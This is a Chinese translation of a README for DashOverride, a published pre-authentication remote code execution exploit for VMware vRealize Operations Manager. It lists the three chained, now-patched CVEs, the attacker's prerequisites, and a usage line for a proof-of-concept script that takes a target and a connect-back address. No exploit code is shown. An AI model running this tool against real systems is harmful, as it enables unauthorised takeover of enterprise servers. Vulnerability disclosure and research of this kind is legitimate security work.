项目地址

https://github.com/sourceincite/DashOverride

DashOverride

What

这是 VMware vRealize Operations Manager (vROPS) 的预验证 RCE 漏洞利用，影响版本 <= 8.6.3.19682901。

作者

奇虎 360 漏洞研究所的 Steven Seeley

已测试

该漏洞已使用文件 (SHA1: 4637b6385db4fbee6b1150605087197f8d03ba00) 针对 8.6.3.19682901 进行了测试， vRealize-Operations-Manager-Appliance-8.6.3.19682901_OVF10.ova 但已知它也适用于其他旧版本。

备注

• 此漏洞利用链接了三个已 修补 的漏洞。 可以在 博客文章 中找到更多详细信息：
  • CVE-2022-31675 – MainPortalFilter ui 身份验证绕过
  • CVE-2022-31674 – SupportLogAction 信息泄露
  • CVE-2022-31672 – generateSupportBundle VCOPS_BASE 权限升级
• 此漏洞利用将要求攻击者提供：
  • 将用于绕过身份验证的有效仪表板链接令牌。
  • 他们自己的 SMTP 服务器设置，这是为了确保利用有效。
  • 由 VMWare 签名的有效 Pak 文件，例如 APUAT-8.5.0.18176777.pak .
• 这个漏洞利用有很多活动部分，希望我设计正确，所以它可以在第一次拍摄时使用。
• 该漏洞平均需要 ~1m34.142s 才能完成（测试 5 次），我试图将其设计得更快，但它在分配的比赛时间内；->

运行

researcher@mars:~$ ./poc.py
(+) usage: ./poc.py <target> <connectback> <dashboardlink_token>
(+) eg: ./poc.py 192.168.2.196 192.168.2.234 uuncuybis9

示例